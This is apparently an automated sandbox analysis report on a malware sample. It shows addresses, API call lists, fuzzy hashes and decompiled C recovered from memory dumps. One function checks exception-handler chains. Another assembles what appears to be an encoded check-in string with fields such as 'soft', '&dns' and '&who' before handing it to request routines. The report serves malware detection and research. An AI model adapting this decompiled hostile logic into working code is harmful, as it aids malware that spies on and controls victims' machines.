0x022b89d5
0x022b89de
0x022b89e7
0x022b89ef
0x022b89f7
0x022b8a01
0x022b8a16

APIs

memset.NTDLL ref: 022B8A0A

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 9738b88dab78f4f3c55dd3ab68ea444fce282e220e1740be5f8b1eeaded77b95
Instruction ID: c94585d52e11e13e52c481019c477d087ede4e5eb7caaf4ee76ade4d5c2903af
Opcode Fuzzy Hash: 9738b88dab78f4f3c55dd3ab68ea444fce282e220e1740be5f8b1eeaded77b95
Instruction Fuzzy Hash: DC22857BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 022BB1E5, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E022BB1E5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x22bd2e0; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x22bd328 = 1;
										__eflags =  *0x22bd328;
										if( *0x22bd328 != 0) {
											goto L60;
										}
										_t84 =  *0x22bd2e0; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x22bd328 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x22bd2e0 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x22bd2e8 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x22bd2e4 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x22bd2e8 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x22bd2e8 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x22bd328 = 1;
							__eflags =  *0x22bd328;
							if( *0x22bd328 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x22bd2e8 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x22bd2e8 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x22bd328 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x22bd2e8 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x22bd2e0 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x22bd2e8 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x22bd2e8 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x022bb1ef
0x022bb1f2
0x022bb1f8
0x022bb216
0x00000000
0x022bb216
0x022bb200
0x022bb209
0x022bb20f
0x022bb21e
0x022bb221
0x022bb224
0x022bb22e
0x022bb22e
0x022bb230
0x022bb233
0x022bb235
0x022bb235
0x022bb237
0x022bb23a
0x00000000
0x00000000
0x022bb23c
0x022bb23e
0x022bb2a4
0x022bb2a4
0x022bb402
0x00000000
0x022bb402
0x022bb240
0x022bb240
0x022bb244
0x022bb246
0x022bb246
0x022bb246
0x022bb246
0x022bb249
0x022bb24a
0x022bb24d
0x022bb24d
0x022bb251
0x022bb255
0x022bb263
0x022bb263
0x022bb26b
0x022bb271
0x022bb273
0x022bb275
0x022bb285
0x022bb292
0x022bb296
0x022bb29b
0x022bb29d
0x022bb31b
0x022bb31b
0x022bb29f
0x022bb29f
0x022bb29f
0x022bb31d
0x022bb31f
0x022bb400
0x022bb400
0x00000000
0x022bb325
0x022bb325
0x022bb32c
0x00000000
0x00000000
0x022bb332
0x022bb336
0x022bb392
0x022bb394
0x022bb39c
0x022bb39e
0x022bb3a0
0x00000000
0x00000000
0x022bb3a2
0x022bb3a8
0x022bb3aa
0x022bb3ac
0x022bb3c1
0x022bb3c1
0x022bb3c3
0x022bb3f2
0x022bb3f9
0x00000000
0x022bb3f9
0x022bb3c7
0x022bb3c8
0x022bb3ca
0x022bb3cc
0x022bb3cc
0x022bb3ce
0x022bb3d0
0x022bb3d2
0x022bb3e6
0x022bb3e6
0x022bb3e9
0x022bb3eb
0x022bb3eb
0x022bb3ec
0x022bb3ec
0x00000000
0x022bb3d4
0x022bb3d4
0x022bb3d4
0x022bb3dd
0x022bb3de
0x022bb3e0
0x022bb3e2
0x022bb3e2
0x00000000
0x022bb3d4
0x022bb3d2
0x022bb3ae
0x022bb3b5
0x022bb3b5
0x022bb3b7
0x00000000
0x00000000
0x022bb3b9
0x022bb3ba
0x022bb3bd
0x022bb3bf
0x00000000
0x00000000
0x00000000
0x022bb3bf
0x00000000
0x022bb3b5
0x022bb338
0x022bb33b
0x022bb340
0x00000000
0x00000000
0x022bb349
0x022bb34b
0x022bb351
0x00000000
0x00000000
0x022bb357
0x022bb35d
0x00000000
0x00000000
0x022bb363
0x022bb365
0x022bb36e
0x022bb372
0x00000000
0x00000000
0x022bb378
0x022bb37b
0x022bb37d
0x00000000
0x00000000
0x022bb384
0x022bb386
0x00000000
0x00000000
0x022bb388
0x022bb38c
0x00000000
0x00000000
0x00000000
0x022bb38c
0x00000000
0x00000000
0x00000000
0x022bb277
0x022bb277
0x022bb277
0x022bb27e
0x00000000
0x00000000
0x022bb280
0x022bb281
0x022bb283
0x00000000
0x00000000
0x00000000
0x022bb283
0x022bb2ab
0x022bb2ad
0x00000000
0x00000000
0x022bb2bd
0x022bb2bf
0x022bb2c1
0x00000000
0x00000000
0x022bb2c7
0x022bb2ce
0x022bb2fa
0x022bb2fa
0x022bb2fc
0x022bb2fe
0x022bb312
0x022bb314
0x00000000
0x00000000
0x00000000
0x00000000
0x022bb300
0x022bb300
0x022bb300
0x022bb309
0x022bb30a
0x022bb30c
0x022bb30e
0x022bb30e
0x00000000
0x022bb300
0x022bb2d0
0x022bb2d0
0x022bb2d3
0x022bb2d5
0x022bb2e7
0x022bb2e7
0x022bb2ea
0x022bb2ec
0x022bb2ec
0x022bb2ed
0x022bb2ed
0x022bb2f3
0x022bb2f3
0x00000000
0x00000000
0x00000000
0x00000000
0x022bb2d7
0x022bb2d7
0x022bb2d7
0x022bb2de
0x00000000
0x00000000
0x022bb2e0
0x022bb2e0
0x022bb2e1
0x00000000
0x00000000
0x00000000
0x022bb2e1
0x022bb2e3
0x022bb2e5
0x022bb2f8
0x00000000
0x00000000
0x00000000
0x022bb2f8
0x00000000
0x022bb2e5
0x022bb257
0x022bb25a
0x022bb25d
0x00000000
0x00000000
0x022bb25f
0x022bb261
0x00000000
0x00000000
0x00000000
0x022bb261
0x022bb226
0x022bb228
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 022BB296

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: b74a2d9c406393e1e8257f2d7cd2f1ad11519d93504d2e6cdee49dc01988b68c
Instruction ID: 31e44c4a3e2860410392f3436c4f44be36f0418f670ba980d8738ab0a5a9a849
Opcode Fuzzy Hash: b74a2d9c406393e1e8257f2d7cd2f1ad11519d93504d2e6cdee49dc01988b68c
Instruction Fuzzy Hash: E761B731E206068FDB1BCAE9D8947ED73A5EF853DCF248529DC55CB189E7B0D842C640

Uniqueness

Uniqueness Score: -1.00%

Function 022BAFC0, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E022BAFC0(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E022BB12B(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E022BB1E5(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E022BB0D0(_t55, _t66);
										_t89 = _t66 + 0x10;
										E022BB12B(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E022BB1C7(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x022bafc4
0x022bafc5
0x022bafc6
0x022bafc9
0x022bafcb
0x022bafce
0x022bafcf
0x022bafd1
0x022bafd2
0x022bafd3
0x022bafd6
0x022bafe0
0x022bb091
0x022bb098
0x022bb0a1
0x022bafe6
0x022bafe6
0x022bafec
0x022baff2
0x022baff5
0x022baff8
0x022baffc
0x022bb001
0x022bb006
0x022bb086
0x00000000
0x022bb008
0x022bb008
0x022bb014
0x022bb016
0x022bb071
0x022bb071
0x022bb077
0x00000000
0x022bb018
0x022bb027
0x022bb029
0x022bb02a
0x022bb02b
0x022bb02e
0x022bb02e
0x022bb030
0x00000000
0x022bb032
0x022bb032
0x022bb07c
0x022bb034
0x022bb034
0x022bb038
0x022bb040
0x022bb045
0x022bb04a
0x022bb056
0x022bb05e
0x022bb065
0x022bb06b
0x022bb06f
0x00000000
0x022bb06f
0x022bb032
0x022bb030
0x00000000
0x022bb016
0x022bb08a
0x022bb08a
0x022bb08a
0x022bb006
0x022bb0a6
0x022bb0ad

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction ID: c13fb89002d9886db233e320ec8ffc999839342454ad89dc79ec9cabc1696fa5
Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction Fuzzy Hash: 1221A4369102059BCB11EFA9C8809F7BBA5FF48394B058568DD658B249D730FA15CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 0235C2F6, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.559143030.0000000002359000.00000040.00000001.sdmp, Offset: 02359000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 7029d161733c4549d1d0a0e1809a6ae414685cb2e3d8dfd964286d1d70e7dd18
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 0211A5723402149FDB54DF55DCC1FA673EAFB89324B198456ED08CB312D679E841CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004216DE, Relevance: 47.7, APIs: 24, Strings: 3, Instructions: 431COMMON

Download Yara Rule

APIs

__invoke_watson_if_error.LIBCMTD ref: 00421722
__invoke_watson_if_error.LIBCMTD ref: 00421943

Part of subcall function 00418B80: __invoke_watson.LIBCMTD ref: 00418BA1

_wcscat_s.LIBCMTD ref: 0042193A

Part of subcall function 00426420: __invalid_parameter.LIBCMTD ref: 00426492

_wcscat_s.LIBCMTD ref: 00421972

Part of subcall function 00426420: _memset.LIBCMT ref: 004264FB
Part of subcall function 00426420: __invalid_parameter.LIBCMTD ref: 00426557

__invoke_watson_if_error.LIBCMTD ref: 0042197B
__snwprintf_s.LIBCMTD ref: 004219D4

Part of subcall function 0041FCA0: __vsnprintf_s_l.LIBCMTD ref: 0041FCC2

__invoke_watson_if_oneof.LIBCMTD ref: 00421A0D
_wcscpy_s.LIBCMTD ref: 00421A52
__invoke_watson_if_error.LIBCMTD ref: 00421A5B
__invoke_watson_if_oneof.LIBCMTD ref: 00421AFE
_wcscpy_s.LIBCMTD ref: 00421B36
__invoke_watson_if_error.LIBCMTD ref: 00421B3F
__itow_s.LIBCMTD ref: 00421719

Part of subcall function 00426800: _xtow_s@20.LIBCMTD ref: 0042682B

__strftime_l.LIBCMTD ref: 004217D9
__invoke_watson_if_oneof.LIBCMTD ref: 00421812
_wcscpy_s.LIBCMTD ref: 00421857
__invoke_watson_if_error.LIBCMTD ref: 00421860
_wcscpy_s.LIBCMTD ref: 004218B3
__invoke_watson_if_error.LIBCMTD ref: 004218BC
__invoke_watson_if_error.LIBCMTD ref: 004218F6

Strings

hxH@, xrefs: 004218CB
h N@, xrefs: 004218D0
P.K, xrefs: 004218EC

Memory Dump Source

Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: __invoke_watson_if_error$_wcscpy_s$__invoke_watson_if_oneof$__invalid_parameter_wcscat_s$__invoke_watson__itow_s__snwprintf_s__strftime_l__vsnprintf_s_l_memset_xtow_s@20
String ID: P.K$h N@$hxH@
API String ID: 2137535789-2079250698
Opcode ID: 29491991e5cb9ead286945ef0833d57d3bc7c32fcfb5584e67471eb725f4c58b
Instruction ID: 3cf955722490d12626ff05c4d7cd76007c92f7d8c1606608647920377fbf0936
Opcode Fuzzy Hash: 29491991e5cb9ead286945ef0833d57d3bc7c32fcfb5584e67471eb725f4c58b
Instruction Fuzzy Hash: E502E6B4A40318ABDB20EF51DC46FDF7374AB54706F5041AAF6087A2D1D7B89A84CF98

Uniqueness

Uniqueness Score: -1.00%

Function 022B5450, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 244
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E022B5450(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t100;
				signed int _t104;
				char** _t106;
				int _t109;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				intOrPtr _t126;
				int _t130;
				CHAR* _t132;
				intOrPtr _t133;
				void* _t134;
				void* _t143;
				int _t144;
				void* _t145;
				intOrPtr _t146;
				void* _t148;
				long _t152;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t143 = __edx;
				_t134 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x22bd018; // 0x139c7884
				asm("bswap eax");
				_t61 =  *0x22bd014; // 0x3a87c8cd
				_t132 = _a16;
				asm("bswap eax");
				_t62 =  *0x22bd010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0x22bd00c; // 0xeec43f25
				asm("bswap eax");
				_t64 =  *0x22bd2a8; // 0x24ba5a8
				_t3 = _t64 + 0x22be633; // 0x74666f73
				_t144 = wsprintfA(_t132, _t3, 3, 0x3d163, _t63, _t62, _t61, _t60,  *0x22bd02c,  *0x22bd004, _t59);
				_t67 = E022B3288();
				_t68 =  *0x22bd2a8; // 0x24ba5a8
				_t4 = _t68 + 0x22be673; // 0x74707526
				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
				_t160 = _t158 + 0x38;
				_t145 = _t144 + _t71;
				_t72 = E022B831C(_t134);
				_t133 = __imp__; // 0x74e05520
				_v8 = _t72;
				if(_t72 != 0) {
					_t126 =  *0x22bd2a8; // 0x24ba5a8
					_t7 = _t126 + 0x22be8d4; // 0x736e6426
					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
					_t160 = _t160 + 0xc;
					_t145 = _t145 + _t130;
					HeapFree( *0x22bd238, 0, _v8);
				}
				_t73 = E022B9267();
				_v8 = _t73;
				if(_t73 != 0) {
					_t121 =  *0x22bd2a8; // 0x24ba5a8
					_t11 = _t121 + 0x22be8dc; // 0x6f687726
					wsprintfA(_t145 + _a16, _t11, _t73);
					_t160 = _t160 + 0xc;
					HeapFree( *0x22bd238, 0, _v8);
				}
				_t146 =  *0x22bd32c; // 0x47795b0
				_t75 = E022B284E(0x22bd00a, _t146 + 4);
				_t152 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					HeapFree( *0x22bd238, _t152, _a16);
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x22bd238, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x22bd238, _t152, _v20);
						goto L26;
					}
					E022B3239(GetTickCount());
					_t82 =  *0x22bd32c; // 0x47795b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x22bd32c; // 0x47795b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x22bd32c; // 0x47795b0
					_t148 = E022B7B8D(1, _t143, _a16,  *_t88);
					_v28 = _t148;
					asm("lock xadd [eax], ecx");
					if(_t148 == 0) {
						L24:
						HeapFree( *0x22bd238, _t152, _v8);
						goto L25;
					}
					StrTrimA(_t148, 0x22bc28c);
					_push(_t148);
					_t94 = E022BA677();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x22bd238, _t152, _t148);
						goto L24;
					}
					_t153 = __imp__;
					 *_t153(_t148, _a4);
					 *_t153(_v8, _v20);
					_t154 = __imp__;
					 *_t154(_v8, _v16);
					_t100 = E022B7B3B( *_t154(_v8, _t148), _v8);
					_a4 = _t100;
					if(_t100 == 0) {
						_v12 = 8;
						L21:
						E022B5433();
						L22:
						HeapFree( *0x22bd238, 0, _v16);
						_t152 = 0;
						goto L23;
					}
					_t104 = E022B9F33(_t133, 0xffffffffffffffff, _t148,  &_v24);
					_v12 = _t104;
					if(_t104 == 0) {
						_t157 = _v24;
						_v12 = E022B137B(_t157, _a4, _a8, _a12);
						_t112 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
						_t114 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t114 + 8))(_t114);
						_t116 =  *((intOrPtr*)(_t157 + 4));
						 *((intOrPtr*)( *_t116 + 8))(_t116);
						_t118 =  *_t157;
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						E022B8B22(_t157);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t106 = _a8;
							if(_t106 != 0) {
								_t149 =  *_t106;
								_t155 =  *_a12;
								wcstombs( *_t106,  *_t106,  *_a12);
								_t109 = E022B7953(_t149, _t149, _t155 >> 1);
								_t148 = _v28;
								 *_a12 = _t109;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E022B8B22(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}

0x022b5450
0x022b5450
0x022b5450
0x022b5459
0x022b5462
0x022b5464
0x022b5464
0x022b5471
0x022b547c
0x022b547f
0x022b5484
0x022b548d
0x022b5490
0x022b5495
0x022b5498
0x022b549d
0x022b54a0
0x022b54ac
0x022b54b9
0x022b54bb
0x022b54c1
0x022b54c6
0x022b54d1
0x022b54d3
0x022b54d6
0x022b54d8
0x022b54dd
0x022b54e3
0x022b54e8
0x022b54eb
0x022b54f0
0x022b54fd
0x022b54ff
0x022b5505
0x022b550f
0x022b550f
0x022b5511
0x022b5516
0x022b551b
0x022b551e
0x022b5523
0x022b5530
0x022b5532
0x022b5540
0x022b5540
0x022b5542
0x022b5550
0x022b5555
0x022b5557
0x022b555c
0x022b571d
0x022b5727
0x022b5730
0x022b5562
0x022b556e
0x022b5574
0x022b5579
0x022b5711
0x022b571b
0x00000000
0x022b571b
0x022b5585
0x022b558a
0x022b5593
0x022b55a4
0x022b55a8
0x022b55b1
0x022b55b7
0x022b55c6
0x022b55cd
0x022b55d6
0x022b55dc
0x022b5705
0x022b570f
0x00000000
0x022b570f
0x022b55e8
0x022b55ee
0x022b55ef
0x022b55f4
0x022b55f9
0x022b56fb
0x022b5703
0x00000000
0x022b5703
0x022b5602
0x022b5609
0x022b5611
0x022b5616
0x022b561f
0x022b562a
0x022b562f
0x022b5634
0x022b5733
0x022b56e7
0x022b56e7
0x022b56ec
0x022b56f7
0x022b56f9
0x00000000
0x022b56f9
0x022b563e
0x022b5643
0x022b5648
0x022b564d
0x022b565d
0x022b5660
0x022b5666
0x022b566c
0x022b5672
0x022b5675
0x022b567b
0x022b567e
0x022b5683
0x022b5687
0x022b5687
0x022b5693
0x022b569f
0x022b56a3
0x022b56a5
0x022b56aa
0x022b56ac
0x022b56b1
0x022b56b6
0x022b56c3
0x022b56cb
0x022b56ce
0x022b56ce
0x022b56aa
0x00000000
0x022b5695
0x022b5699
0x022b56d0
0x022b56d3
0x022b56dc
0x00000000
0x00000000
0x00000000
0x00000000
0x022b56dc
0x022b569b
0x00000000
0x022b569b
0x022b5693

APIs

GetTickCount.KERNEL32 ref: 022B5464
wsprintfA.USER32 ref: 022B54B4
wsprintfA.USER32 ref: 022B54D1
wsprintfA.USER32 ref: 022B54FD
HeapFree.KERNEL32(00000000,?), ref: 022B550F
wsprintfA.USER32 ref: 022B5530
HeapFree.KERNEL32(00000000,?), ref: 022B5540
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 022B556E
GetTickCount.KERNEL32 ref: 022B557F
RtlEnterCriticalSection.NTDLL(04779570), ref: 022B5593
RtlLeaveCriticalSection.NTDLL(04779570), ref: 022B55B1

Part of subcall function 022B7B8D: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,022B9DA0,?,047795B0), ref: 022B7BB8
Part of subcall function 022B7B8D: lstrlen.KERNEL32(?,?,?,022B9DA0,?,047795B0), ref: 022B7BC0
